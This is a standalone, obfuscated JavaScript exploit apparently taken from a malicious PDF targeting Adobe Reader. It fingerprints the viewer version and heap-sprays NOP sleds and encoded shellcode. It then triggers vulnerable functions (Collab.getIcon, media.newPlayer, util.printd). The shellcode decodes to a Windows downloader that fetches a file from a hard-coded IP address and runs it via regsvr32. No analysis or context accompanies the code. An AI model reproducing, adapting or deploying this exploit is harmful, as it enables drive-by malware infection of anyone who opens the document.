var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3764%u702E%u7068%u663F%u673D%u0000';var 
_2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3864%u702E%u7068%u663F%u6E3D%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var 
_1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('



');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}